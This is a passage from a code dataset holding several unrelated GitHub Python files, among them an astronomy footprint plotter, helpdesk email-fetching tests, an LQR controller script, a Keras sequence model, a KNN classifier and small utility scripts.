np.arange(0,360.0,0.25),\n 0.0,\n frame='geocentrictrueecliptic',unit='deg'\n ).icrs\n\n ecliptic_equator_ra = np.array(\n [x.ra.value for x in ecliptic_equator]\n )\n ecliptic_equator_decl = np.array(\n [x.dec.value for x in ecliptic_equator]\n )\n\n eclra = ecliptic_equator_ra[::]\n ecldec = ecliptic_equator_decl[::]\n eclra[eclra > 180.0] = eclra[eclra > 180.0] - 360.0\n\n if east_is_left:\n eclra = -eclra\n\n ax.scatter(\n np.radians(eclra),\n np.radians(ecldec),\n s=25,\n color='#6c757d',\n marker='o',\n zorder=-80,\n label='Ecliptic plane',\n rasterized=True\n )\n\n #\n # now, we'll go through each collection\n #\n\n collection_labels = {}\n\n for ci, cdir in enumerate(collection_dirlist):\n\n LOGINFO('plotting footprint for collection: %s' % cdir.replace('-','_'))\n\n footprint_pkl = os.path.join(cdir, 'catalog-footprint.pkl')\n with open(footprint_pkl,'rb') as infd:\n footprint = pickle.load(infd)\n\n hull_boundary = footprint['%s_hull_boundary' % use_hull]\n hull = footprint['%s_hull' % use_hull]\n\n if isinstance(hull_boundary, np.ndarray):\n\n covras = hull_boundary[:,0]\n covdecls = hull_boundary[:,1]\n # wrap the RAs\n covras[covras > 180.0] = covras[covras > 180.0] - 360.0\n\n if east_is_left:\n covras = -covras\n\n if isinstance(use_colorlist, (list, tuple)):\n\n ax.fill(\n np.radians(covras),\n np.radians(covdecls),\n linewidth=0.0,\n color=use_colorlist[ci],\n alpha=use_alpha,\n rasterized=True,\n gid=\"patch-collection-%s-part-%s\" % (\n footprint['collection'],\n 0\n )\n )\n\n else:\n ax.fill(\n np.radians(covras),\n np.radians(covdecls),\n linewidth=0.0,\n color=plt.get_cmap(use_colormap)(\n 1.0 * ci/len(collection_dirlist)\n ),\n alpha=use_alpha,\n rasterized=True,\n gid=\"patch-collection-%s-part-%s\" % (\n footprint['collection'],\n 0\n )\n )\n\n collection_label = ax.text(\n np.radians(np.mean(covras)),\n np.radians(np.mean(covdecls)),\n footprint['collection'],\n fontsize=13,\n ha='center',\n va='center',\n zorder=100,\n # color='#b8daff',\n color='white',\n url='#fp-collection/%s' % footprint['collection'],\n gid=\"label-collection-%s\" % footprint['collection'],\n )\n # add an outline to the label so it's visible against any background\n # https://matplotlib.org/users/patheffects_guide.html\n collection_label.set_path_effects(\n [path_effects.Stroke(linewidth=3, foreground='black'),\n path_effects.Normal()]\n )\n collection_labels[footprint['collection']] = {\n 'label':collection_label,\n 'collection_dir':os.path.abspath(cdir)\n }\n\n # if we have an non-contiguous collection\n elif isinstance(hull_boundary, list):\n\n LOGWARNING('this collection is not contiguous')\n\n part_center_ras, part_center_decls, part_areas = [], [], []\n\n for partind, part, bound in zip(range(len(hull)),\n hull,\n hull_boundary):\n\n covras = bound[:,0]\n covdecls = bound[:,1]\n # wrap the RAs\n covras[covras > 180.0] = covras[covras > 180.0] - 360.0\n\n if east_is_left:\n covras = -covras\n\n if isinstance(use_colorlist, (list, tuple)):\n\n ax.fill(\n np.radians(covras),\n np.radians(covdecls),\n linewidth=0.0,\n color=use_colorlist[ci],\n alpha=use_alpha,\n rasterized=True,\n gid=\"patch-collection-%s-part-%s\" % (\n footprint['collection'],\n partind\n )\n )\n\n else:\n ax.fill(\n np.radians(covras),\n np.radians(covdecls),\n linewidth=0.0,\n color=plt.get_cmap(use_colormap)(\n 1.0 * ci/len(collection_dirlist)\n ),\n alpha=use_alpha,\n rasterized=True,\n gid=\"patch-collection-%s-part-%s\" % (\n footprint['collection'],\n partind\n )\n )\n\n part_center_ras.append(np.mean(covras))\n part_center_decls.append(np.mean(covdecls))\n part_areas.append(part.area)\n\n # since the collection is not contiguous, we'll move its label from\n # the center of the collection to a weighted center calculated by\n # weighting the area of the separate parts\n\n # we weight by an exponent to push more strongly towards larger\n # parts of the collection.\n collection_label_ra = np.average(\n part_center_ras,\n weights=np.array(part_areas)**2.5\n )\n collection_label_decl = np.average(\n part_center_decls,\n weights=np.array(part_areas)**2.5\n )\n\n collection_label = ax.text(\n np.radians(collection_label_ra),\n np.radians(collection_label_decl),\n footprint['collection'],\n fontsize=13,\n ha='center',\n va='center',\n zorder=100,\n color='white',\n # color='#b8daff',\n url='#fp-collection/%s' % footprint['collection'],\n gid=\"label-collection-%s\" % footprint['collection'],\n )\n # add an outline to the label so it's visible against any background\n # https://matplotlib.org/users/patheffects_guide.html\n collection_label.set_path_effects(\n [path_effects.Stroke(linewidth=3, foreground='black'),\n path_effects.Normal()]\n )\n collection_labels[footprint['collection']] = {\n 'label':collection_label,\n 'collection_dir':os.path.abspath(cdir)\n }\n\n # make the grid and the ticks\n ax.grid()\n xt = [np.radians(x) for x in\n [-150.0,-120.0,-90.0,-60.0,-30.0,0.0,30,60,90,120,150.0]]\n xtl = [r'$14^{\\mathrm{h}}$',r'$16^{\\mathrm{h}}$',\n r'$18^{\\mathrm{h}}$',r'$20^{\\mathrm{h}}$',\n r'$22^{\\mathrm{h}}$',r'$0^{\\mathrm{h}}$',\n r'$2^{\\mathrm{h}}$',r'$4^{\\mathrm{h}}$',\n r'$6^{\\mathrm{h}}$',r'$8^{\\mathrm{h}}$',\n r'$10^{\\mathrm{h}}$']\n ax.set_xticks(xt)\n\n if east_is_left:\n xtl = list(reversed(xtl))\n\n ax.set_xticklabels(xtl)\n\n # make the axis labels\n ax.set_xlabel('right ascension [hr]')\n ax.set_ylabel('declination [deg]')\n\n # make the legend\n ax.legend(\n loc='upper right',\n bbox_to_anchor=(1.0, 1.05),\n fontsize=13,\n numpoints=1,\n scatterpoints=1,\n markerscale=3.0,\n ncol=1,\n frameon=False\n )\n\n #\n # make the compass\n #\n\n # north arrow\n plt.arrow(0.165,0.260,0.0,0.03,\n transform=plt.gcf().transFigure,\n color='k',\n clip_on=False)\n\n if east_is_left:\n\n # east arrow\n plt.arrow(0.165,0.260,-0.03,0.00,\n transform=plt.gcf().transFigure,\n color='k',\n clip_on=False)\n\n else:\n\n # east arrow\n plt.arrow(0.165,0.260,0.03,0.00,\n transform=plt.gcf().transFigure,\n color='k',\n clip_on=False)\n\n # north text\n plt.text(0.165,0.295,'North',\n transform=plt.gcf().transFigure,\n fontsize=14,\n color='k',\n ha='center',\n va='bottom',\n clip_on=False)\n\n # east text\n if east_is_left:\n\n plt.text(0.128,0.260,'East',\n transform=plt.gcf().transFigure,\n fontsize=14,\n va='center',\n ha='right',\n color='k',\n clip_on=False)\n\n else:\n\n plt.text(0.197,0.260,'East',\n transform=plt.gcf().transFigure,\n fontsize=14,\n va='center',\n ha='left',\n color='k',\n clip_on=False)\n\n #\n # save the plot to the designated file\n #\n fig.savefig(outfile,\n bbox_inches='tight',\n dpi=dpi,\n transparent=False)\n\n plt.close('all')\n return outfile, collection_labels\n\n\ndef collection_overview_svg(\n basedir,\n collection_dirlist,\n use_hull='concave',\n use_projection='mollweide',\n use_colorlist=None,\n use_colormap='inferno',\n use_alpha=0.5,\n show_galactic_plane=True,\n show_ecliptic_plane=True,\n east_is_left=True,\n dpi=200,\n optimize_svg=True\n):\n '''This generates a coverage map plot for all of the collections in\n collection_dirlist.\n\n This version just calls collection_overview_plot with the file type set to\n SVG and outputs to a file called collection-footprints.svg in the\n LCC-Server's basedir/docs/static directory.\n\n '''\n\n outfile = os.path.join(basedir,\n 'docs',\n 'static',\n 'collection-footprints-temp.svg')\n\n outfile, labels = collection_overview_plot(\n collection_dirlist,\n outfile,\n use_hull=use_hull,\n use_projection=use_projection,\n use_colorlist=use_colorlist,\n use_colormap=use_colormap,\n use_alpha=use_alpha,\n show_galactic_plane=show_galactic_plane,\n show_ecliptic_plane=show_ecliptic_plane,\n east_is_left=east_is_left,\n dpi=dpi\n )\n\n if optimize_svg:\n ret = subprocess.run('scour -i %s -o %s' %\n (outfile, outfile.replace('-temp','')),\n shell=True)\n LOGINFO('Optimized footprint SVG -> %s' % outfile.replace('-temp',''))\n if ret.returncode == 0:\n os.remove(outfile)\n else:\n shutil.move(outfile, outfile.replace('-temp',''))\n LOGERROR('Could not optimize the footprint SVG. Left as is: %s' %\n outfile.replace('-temp',''))\n","repo_name":"waqasbhatti/lcc-server","sub_path":"lccserver/backend/footprints.py","file_name":"footprints.py","file_ext":"py","file_size_in_byte":25360,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"36394625911","text":"import sys\n\ncurrent_movies = {\n 'The Grinch': ['11:00am', \"2:00pm\", \"4:15pm\", \"7:45pm\"],\n 'Hardball': ['11:00am', \"2:00pm\", \"6:15pm\", \"7:45pm\"],\n 'Sharknado': ['9:00am', \"12:00pm\", \"4:30pm\", \"7:45pm\"],\n 'Sharkboy and Lavagirl': ['10:20am', \"2:00pm\", \"4:15pm\", \"7:45pm\"]\n}\n\nall_movies = {\n \"expiredMovies\": [\n {\"name\": \"Jurassic Park\", \"rating\": \"pg13\"},\n {\"name\": \"Johnny Cash\", \"rating\": \"pg\"}\n ],\n \"currentMovies\": [\n { \"name\": 'When Harry Met Sally',\n \"rating\": \"pg13\",\n \"showtimes\": ['11:00am', \"2:00pm\"],\n \"freePopcorn\": \"no\"\n },\n { \"name\": 'Terminator',\n \"rating\": \"pg13\",\n \"showtimes\": ['11:00am', \"2:00pm\"],\n \"freePopcorn\": \"yes\"\n },\n {\n \"name\": \"The Martian\",\n \"rating\": \"pg\",\n \"showtimes\": ['11:00am', \"2:00pm\"],\n \"freePopcorn\": \"yes\"\n },\n {\n \"name\": \"Battlefarce\",\n \"rating\": \"R\",\n \"showtimes\": ['11:00am', \"2:00pm\"],\n \"freePopcorn\": \"no\"\n }\n ]\n}\n\n\nprint(\"Please choose an option:\")\nprint(\"enter [t] to see all movie titles currently playing\")\nprint(\"enter [a] to view all movie titles and their showtimes\")\nprint(\"enter [s] to search for a movie title\")\nprint(\"enter [p] to view free popcorn movie offers\")\nmenuChoice = input().lower()\n\n\n\n\nif menuChoice == \"t\":\n print(\"\\033c\")\n print(\"Current movies available: \")\n for movie in current_movies:\n print(\" \", movie)\n print(\"------\")\n user_movieInput = input(\"What movie would you like showtimes for? \\n\")\nelif menuChoice == \"s\":\n user_movieInput = input(\"What movie would you like showtimes for? \\n\")\nelif menuChoice == \"a\":\n print(\"\\033c\")\n print(\"Current movie showtimes: \")\n for movie in current_movies:\n print(\" \", movie)\n for time in current_movies.get(movie):\n print(\" -- \", \"playing at: \", time)\n print()\nelif menuChoice == \"p\":\n print(\"\\033c\")\n for movie in all_movies[\"currentMovies\"]:\n if (movie[\"freePopcorn\"] == \"yes\"):\n print(movie[\"name\"])\n input()\nelse:\n print(\"invalid entry -- exiting program\")\n sys.exit()\n \n\nuser_movieInput = user_movieInput.title()\nshowtime = current_movies.get(user_movieInput)\nprint()\nif user_movieInput in current_movies:\n if showtime == None:\n print(user_movieInput, \"is not playing today\")\n else:\n print(user_movieInput, \"is playing today at:\")\n for time in showtime:\n print(\" \", time)\nelse:\n print(\"movie not found\", user_movieInput)","repo_name":"ember-parr/python-intro","sub_path":"movieSchedule.py","file_name":"movieSchedule.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43590698616","text":"import urllib2\nimport os\n\nURL_PREFIXES = (\"http://\", \"https://\", \"ftp://\")\n\ndef readFile( filestr ):\n contentstr = None\n if filestr.startswith(URL_PREFIXES):\n contentstr = readFromURL(filestr)\n else:\n contentstr = readFromLocalFile(filestr)\n return contentstr\n\ndef readFromLocalFile( filename ):\n readstr = None\n filename = os.path.expanduser( filename )\n with open(filename, 'r') as f:\n readstr = f.read()\n return readstr\n\ndef readFromURL( url ):\n readstr = None\n u = urllib2.urlopen(url) \n readstr = u.read()\n return readstr\n \n","repo_name":"fabric-testbed/MeasurementFramework","sub_path":"instrumentize/geni/OMNI_docker/geni-tools-2.11/src/gcf/omnilib/util/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35087692002","text":"import os\nimport sys\n\nsys.path.append(os.path.split(os.getcwd())[0])\nimport common\n\nclass CSharpDevice(common.Device):\n def get_csharp_class_name(self):\n return self.get_camel_case_category() + self.get_camel_case_name()\n\nclass CSharpPacket(common.Packet):\n def get_csharp_parameter_list(self, use_out_params=True):\n param = []\n\n for element in self.get_elements():\n if (not use_out_params) and element.get_direction() == 'out':\n continue\n\n out = ''\n if element.get_direction() == 'out' and self.get_type() == 'function':\n out = 'out '\n\n csharp_type = element.get_csharp_type()\n name = element.get_headless_camel_case_name()\n\n param.append('{0}{1} {2}'.format(out, csharp_type, name))\n\n return ', '.join(param)\n\n def get_csharp_method_signature(self, print_full_name=False, is_doc=False):\n sig_format = \"public {4}{0} {1}{2}({3})\"\n ret_count = len(self.get_elements('out'))\n params = self.get_csharp_parameter_list(ret_count > 1)\n return_type = 'void'\n\n if ret_count == 1:\n return_type = self.get_elements('out')[0].get_csharp_type()\n\n class_prefix = ''\n\n if print_full_name:\n class_prefix = self.get_device().get_csharp_class_name() + '::'\n\n override = ''\n\n if not is_doc and self.has_prototype_in_device():\n override = 'override '\n\n return sig_format.format(return_type, class_prefix, self.get_camel_case_name(), params, override)\n\ncsharp_types = {\n 'int8': 'short',\n 'uint8': 'byte',\n 'int16': 'short',\n 'uint16': 'int',\n 'int32': 'int',\n 'uint32': 'long',\n 'int64': 'long',\n 'uint64': 'long',\n 'float': 'float',\n 'bool': 'bool',\n 'char': 'char',\n 'string': 'string'\n}\n\ndef get_csharp_type(type, cardinality):\n t = csharp_types[type]\n\n if cardinality > 1 and type != 'string':\n t += '[]'\n\n return t\n\nclass CSharpElement(common.Element):\n csharp_le_converter_types = {\n 'int8': 'byte',\n 'uint8': 'byte',\n 'int16': 'short',\n 'uint16': 'short',\n 'int32': 'int',\n 'uint32': 'int',\n 'int64': 'long',\n 'uint64': 'long',\n 'float': 'float',\n 'bool': 'bool',\n 'char': 'char',\n 'string': 'string'\n }\n\n csharp_le_converter_from_methods = {\n 'int8': 'SByteFrom',\n 'uint8': 'ByteFrom',\n 'int16': 'ShortFrom',\n 'uint16': 'UShortFrom',\n 'int32': 'IntFrom',\n 'uint32': 'UIntFrom',\n 'int64': 'LongFrom',\n 'uint64': 'ULongFrom',\n 'float': 'FloatFrom',\n 'bool': 'BoolFrom',\n 'char': 'CharFrom',\n 'string': 'StringFrom'\n }\n\n def get_csharp_type(self):\n return get_csharp_type(self.get_type(), self.get_cardinality())\n\n def get_csharp_le_converter_type(self):\n t = CSharpElement.csharp_le_converter_types[self.get_type()]\n\n if self.get_cardinality() > 1 and self.get_type() != 'string':\n t += '[]'\n\n return t\n\n def get_csharp_le_converter_from_method(self):\n m = CSharpElement.csharp_le_converter_from_methods[self.get_type()]\n\n if m != 'StringFrom' and self.get_cardinality() > 1:\n m = m.replace('From', 'ArrayFrom')\n\n return m\n","repo_name":"ppacher/generators","sub_path":"csharp/csharp_common.py","file_name":"csharp_common.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"36673772678","text":"\"\"\"Script to compute LQR-controller gain for stabilizing the 2D N Ball Balancer, based on numerical parameter values.\n\"\"\"\nimport context\n\nimport numpy as np\nfrom scipy.linalg import solve_continuous_are\nimport matplotlib.pyplot as plt\n\nimport pickle\n\nfrom symbolic_dynamics_n import ang, omega, omega_dot, omega_cmd, all_constants\nfrom model_2d.param import getDefaultParam\n\n\ndef computeControllerGains(N: int, verbose: bool = False):\n\n dyn_lin = pickle.load(open(f\"linear_dynamics_{N}.p\", \"rb\"))\n\n dyn_lin = dyn_lin.subs(getDefaultParam(N))\n\n assert(dyn_lin.jacobian(all_constants).is_zero_matrix)\n\n # extract matrices such that M*x_ddot + D*x_dot + K*x = Bd*u\n M = dyn_lin.jacobian(omega_dot)\n D = dyn_lin.jacobian(omega)\n K = dyn_lin.jacobian(ang)\n Bd = dyn_lin.diff(omega_cmd)\n\n # convert to first order x_ddot = A*x + B*u\n dim = dyn_lin.shape[0]\n\n A = np.zeros([2 * dim, 2 * dim], dtype=float)\n\n A[:dim, dim:] = np.eye(dim)\n A[dim:, :dim] = np.array(-M.LUsolve(K))\n A[dim:, dim:] = np.array(-M.LUsolve(D))\n\n B = np.zeros([2 * dim, 1], dtype=float)\n\n B[dim:, :] = np.array(-M.LUsolve(Bd))\n\n # check controlability matrix\n X = [B]\n for _ in range(dim - 1):\n X.append(np.dot(A, X[-1]))\n\n X = np.column_stack(X)\n\n assert(np.linalg.matrix_rank(X) == dim)\n\n # eigenvalues\n if verbose:\n print('open loop eigenvalues: \\n{}'.format(np.linalg.eigvals(A)))\n\n # LQR controller:\n # https://en.wikipedia.org/wiki/Linear%E2%80%93quadratic_regulator\n R = np.ones([1, 1], dtype=float) * 1\n # not punishing alpha_N deviations will stabilize the system at an arbitrary alpha_N\n # state: alpha_N-1, phi, psi_0, ..., psi_N, alpha_N-1_dot, phi_dot, psi_0_dot, ... , psi_N-1_dot\n Q = np.diag(np.concatenate([np.zeros(N + 1), np.array([4, 8]), np.array([4 * (2**x) for x in range(N - 1)])]))\n\n # solve continuous Riccati equation\n P = solve_continuous_are(A, B, Q, R)\n\n # compute controller gain\n K = np.dot(np.linalg.inv(R), np.dot(B.T, P))\n\n if verbose:\n # compute eigenvalues of closed loop system\n eig = np.linalg.eigvals(A - np.dot(B, K))\n print('closed loop eigenvalues: \\n{}'.format(eig))\n\n # find minimal damping coefficient\n zeta = [np.absolute(e.real) / np.absolute(e) for e in eig if e < 0]\n print('minimal damping ratio: {}'.format(min(zeta)))\n\n return K, eig\n\n\nif __name__ == '__main__':\n\n K, eig = computeControllerGains(2, True)\n\n plt.figure()\n plt.plot(eig.real, eig.imag, 'b*')\n plt.xlabel('real')\n plt.ylabel('imag')\n plt.title('poles of closed loop system')\n plt.axis('equal')\n plt.show(block=True)\n","repo_name":"ChristofDubs/DoubleBallBalancer","sub_path":"model_2d/scripts/lqr_controller_n.py","file_name":"lqr_controller_n.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"620444934","text":"from helpdesk.models import Queue, Ticket\nfrom django.test import TestCase\nfrom django.core.management import call_command\nfrom django.utils import six\nfrom django.shortcuts import get_object_or_404\nimport itertools\nfrom shutil import rmtree\nimport sys\nfrom tempfile import mkdtemp\n\ntry: # python 3\n from urllib.parse import urlparse\nexcept ImportError: # python 2\n from urlparse import urlparse\n\ntry:\n # Python >= 3.3\n from unittest import mock\nexcept ImportError:\n # Python < 3.3\n import mock\n\n# class A addresses can't have first octet of 0\nunrouted_socks_server = \"0.0.0.1\"\nunrouted_email_server = \"0.0.0.1\"\n# the last user port, reserved by IANA\nunused_port = \"49151\"\n\n\nclass GetEmailCommonTests(TestCase):\n\n # tests correct syntax for command line option\n def test_get_email_quiet_option(self):\n \"\"\"Test quiet option is properly propagated\"\"\"\n with mock.patch('helpdesk.management.commands.get_email.process_email') as mocked_processemail:\n call_command('get_email', quiet=True)\n mocked_processemail.assert_called_with(quiet=True)\n call_command('get_email')\n mocked_processemail.assert_called_with(quiet=False)\n\n\nclass GetEmailParametricTemplate(object):\n \"\"\"TestCase that checks email functionality accross methods and socks configs.\"\"\"\n\n def setUp(self):\n\n self.temp_logdir = mkdtemp()\n kwargs = {\n \"title\": 'Queue 1',\n \"slug\": 'QQ',\n \"allow_public_submission\": True,\n \"allow_email_submission\": True,\n \"email_box_type\": self.method,\n \"logging_dir\": self.temp_logdir,\n \"logging_type\": 'none'}\n\n if self.method == 'local':\n kwargs[\"email_box_local_dir\"] = '/var/lib/mail/helpdesk/'\n else:\n kwargs[\"email_box_host\"] = unrouted_email_server\n kwargs[\"email_box_port\"] = unused_port\n\n if self.socks:\n kwargs[\"socks_proxy_type\"] = self.socks\n kwargs[\"socks_proxy_host\"] = unrouted_socks_server\n kwargs[\"socks_proxy_port\"] = unused_port\n\n self.queue_public = Queue.objects.create(**kwargs)\n\n def tearDown(self):\n\n rmtree(self.temp_logdir)\n\n def test_read_email(self):\n \"\"\"Tests reading emails from a queue and creating tickets.\n For each email source supported, we mock the backend to provide\n authenticly formatted responses containing our test data.\"\"\"\n test_email = \"To: update.public@example.com\\nFrom: comment@example.com\\nSubject: Some Comment\\n\\nThis is the helpdesk comment via email.\"\n test_mail_len = len(test_email)\n\n if self.socks:\n from socks import ProxyConnectionError\n with self.assertRaisesRegexp(ProxyConnectionError, '%s:%s' % (unrouted_socks_server, unused_port)):\n call_command('get_email')\n\n else:\n # Test local email reading\n if self.method == 'local':\n with mock.patch('helpdesk.management.commands.get_email.listdir') as mocked_listdir, \\\n mock.patch('helpdesk.management.commands.get_email.isfile') as mocked_isfile, \\\n mock.patch('builtins.open' if six.PY3 else '__builtin__.open', mock.mock_open(read_data=test_email)):\n mocked_isfile.return_value = True\n mocked_listdir.return_value = ['filename1', 'filename2']\n\n call_command('get_email')\n\n mocked_listdir.assert_called_with('/var/lib/mail/helpdesk/')\n mocked_isfile.assert_any_call('/var/lib/mail/helpdesk/filename1')\n mocked_isfile.assert_any_call('/var/lib/mail/helpdesk/filename2')\n\n elif self.method == 'pop3':\n # mock poplib.POP3's list and retr methods to provide responses as per RFC 1939\n pop3_emails = {\n '1': (\"+OK\", test_email.split('\\n')),\n '2': (\"+OK\", test_email.split('\\n')),\n }\n pop3_mail_list = (\"+OK 2 messages\", (\"1 %d\" % test_mail_len, \"2 %d\" % test_mail_len))\n mocked_poplib_server = mock.Mock()\n mocked_poplib_server.list = mock.Mock(return_value=pop3_mail_list)\n mocked_poplib_server.retr = mock.Mock(side_effect=lambda x: pop3_emails[x])\n with mock.patch('helpdesk.management.commands.get_email.poplib', autospec=True) as mocked_poplib:\n mocked_poplib.POP3 = mock.Mock(return_value=mocked_poplib_server)\n call_command('get_email')\n\n elif self.method == 'imap':\n # mock imaplib.IMAP4's search and fetch methods with responses from RFC 3501\n imap_emails = {\n \"1\": (\"OK\", ((\"1\", test_email),)),\n \"2\": (\"OK\", ((\"2\", test_email),)),\n }\n imap_mail_list = (\"OK\", (\"1 2\",))\n mocked_imaplib_server = mock.Mock()\n mocked_imaplib_server.search = mock.Mock(return_value=imap_mail_list)\n\n # we ignore the second arg as the data item/mime-part is constant (RFC822)\n mocked_imaplib_server.fetch = mock.Mock(side_effect=lambda x, _: imap_emails[x])\n with mock.patch('helpdesk.management.commands.get_email.imaplib', autospec=True) as mocked_imaplib:\n mocked_imaplib.IMAP4 = mock.Mock(return_value=mocked_imaplib_server)\n call_command('get_email')\n\n ticket1 = get_object_or_404(Ticket, pk=1)\n self.assertEqual(ticket1.ticket_for_url, \"QQ-%s\" % ticket1.id)\n self.assertEqual(ticket1.description, \"This is the helpdesk comment via email.\")\n\n ticket2 = get_object_or_404(Ticket, pk=2)\n self.assertEqual(ticket2.ticket_for_url, \"QQ-%s\" % ticket2.id)\n self.assertEqual(ticket2.description, \"This is the helpdesk comment via email.\")\n\n\n# build matrix of test cases\ncase_methods = [c[0] for c in Queue._meta.get_field('email_box_type').choices]\ncase_socks = [False] + [c[0] for c in Queue._meta.get_field('socks_proxy_type').choices]\ncase_matrix = list(itertools.product(case_methods, case_socks))\n\n# Populate TestCases from the matrix of parameters\nthismodule = sys.modules[__name__]\nfor method, socks in case_matrix:\n\n if method == \"local\" and socks:\n continue\n\n socks_str = \"Nosocks\"\n if socks:\n socks_str = socks.capitalize()\n test_name = str(\n \"TestGetEmail%s%s\" % (method.capitalize(), socks_str))\n\n cl = type(test_name, (GetEmailParametricTemplate, TestCase,), {\n \"method\": method,\n \"socks\": socks})\n setattr(thismodule, test_name, cl)\n","repo_name":"EuroPython/ep-helpdesk","sub_path":"helpdesk/tests/test_get_email.py","file_name":"test_get_email.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"163532298","text":"#import modules\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense\nimport os\nimport numpy as np\nfrom nltk.tokenize import word_tokenize \n\ndef convert_to_onehot( c ):\n tensor = np.zeros(128)\n tensor[ord(c)] = 1\n return tensor\n\ncode_tensors = []\nvocab = set()\ncomments_dict = {}\ncomments = []\ncode_vocab = set()\ncode_dict = {}\n\n\nfile_path = 'code'\nfor root,dirs,files in os.walk(file_path):\n for fl in files:\n code = open('code/'+fl).read()\n code_tensor = [x for x in code][:1000]\n for i in range(1000 - len( code_tensor )):\n code_tensor.append(' ')\n codes.append(code)\n code_words = np.asarray(word_tokenize(code)[:1000])\n for word in code_words:\n code_vocab.add(word)\n comment = open('comments/'+fl).read()\n for com in comment.split():\n vocab.add( com )\n comments.append( comment )\n\ni=0\nfor item in vocab:\n comments_dict[item]=i\n i=i+1\n\ni=0\nfor item in code_vocab:\n code_dict[item]=i\n i=i+1\n\ncomment_tensors_input = []\ncomment_tensors_target = []\n\nfor item in comments:\n comment_tensors = []\n comment = item.split()\n for i in range(10):\n comment_tensor = np.zeros(len(vocab))\n if(i < len(comment)):\n comment_tensor[comments_dict[comment[i]]] = 1\n comment_tensors.append(comment_tensor)\n comment_tensors_input.append(comment_tensors)\n comment_targets = comment_tensors[1:]\n comment_targets.append(np.zeros(len(vocab)))\n print(len(comment_targets))\n comment_tensors_target.append(comment_targets)\n\nfor item in codes:\n code_tensor = []\n code = word_tokenize(code)[:1000]\n for i in range(1000):\n code_tensor_local = np.zeros(len(code_vocab))\n if(i < len(code)):\n code_tensor_local[code_tensor[code[i]]] = 1\n code_tensor.append(code_tensor_local) \n code_tensors.append(code_tensor) \n \n\n\nprint(np.asarray(code_tensors).shape)\nprint(np.asarray(comment_tensors_input).shape)\nprint(np.asarray(comment_tensors_target).shape)\n\n\n# Define an input sequence and process it.\nencoder_inputs = Input(shape=(None, len(code_vocab)))\nencoder = LSTM(100, return_state=True)\nencoder_outputs, state_h, state_c = encoder(encoder_inputs)\n# We discard `encoder_outputs` and only keep the states.\nencoder_states = [state_h, state_c]\n\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, len(vocab)))\n# We set up our decoder to return full output sequences,\n# and to return internal states as well. We don't use the \n# return states in the training model, but we will use them in inference.\ndecoder_lstm = LSTM(100, return_sequences=True, return_state=True)\ndecoder_outputs, _, _ = decoder_lstm(decoder_inputs,\n initial_state=encoder_states)\ndecoder_dense = Dense(len(vocab), activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics = ['accuracy'])\n\nprint(model.summary())\nmodel.fit([np.asarray(code_tensors), np.asarray(comment_tensors_input)], np.asarray(comment_tensors_target),\n batch_size=5,\n epochs=100,\n validation_split=0.2)\n\nmodel.save(\"encdec.h5\")","repo_name":"Milan-J-S/Code-Comprehension-MCQs","sub_path":"src/encdecwords.py","file_name":"encdecwords.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32436288128","text":"import numpy as np\nfrom collections import Counter\n\n\nclass KNN:\n def __init__(self, k=3):\n self.y_train = None\n self.X_train = None\n self.k = k\n\n def fit(self, x, y):\n self.X_train = x\n self.y_train = y\n\n def predict(self, X):\n predictions = [self._predict(x) for x in X]\n return predictions\n\n def _predict(self, x):\n distances = [euclideanDistance(x, x_train) for x_train in self.X_train]\n k_indices = np.argsort(distances)[:self.k]\n k_nearest_labels = [self.y_train[i] for i in k_indices]\n most_common = Counter(k_nearest_labels).most_common(self.k)\n if len(most_common) > 1 and most_common[0][1] == most_common[1][1]:\n y_list = self.y_train.tolist()\n indices = [y_list.index(most_common[i][0] for i in most_common)]\n indices.sort()\n return y_list[indices[0]]\n else:\n return most_common[0][0]\n\n\ndef euclideanDistance(x1, x2):\n distance = np.sqrt(np.sum((x1 - x2)**2))\n return distance\n","repo_name":"EsraaRgb/Machine-Learning-Algorithms-From-Scratch","sub_path":"KNN/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12687749963","text":"import pymongo\n\nF = open('./noneUserInfo11.list', 'a', encoding=\"utf=8\")\nclient = pymongo.MongoClient(host='localhost', port=27017)\ncxk = client.weibo.cxk\nqueryArgs = {\"gender\": None}\nprojectionFields = {'id': True}\nsearchRes = cxk.find(queryArgs, projection=projectionFields)\n\nfor i,item in enumerate(list(searchRes)):\n print(item['id'],file=F)\n\nprint(\"剩余:\", len(list(searchRes)))\n","repo_name":"sherwin/WeiboFansSpider","sub_path":"checkNoneUserInfo.py","file_name":"checkNoneUserInfo.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"26680320460","text":"import Adafruit_ADS1x15\nimport time\nfrom enum import Enum\nimport numpy as np\nfrom pushbullet_alert import pushbullet\n\nadc = Adafruit_ADS1x15.ADS1115()\n\nTHRESHOLD = 2000\n\nclass washer_dryer_state(Enum):\n ON = 1\n OFF = 0\nstate = washer_dryer_state.OFF \n\nsamples = np.array([])\nSAMPLE_SIZE = 200\n\ndef getNoise():\n start = time.time()\n smax = 0\n smin = 1000000\n while time.time()-start<.05:\n sample = adc.read_adc(0,gain=1)\n if sample > smax:\n smax = sample\n if sample < 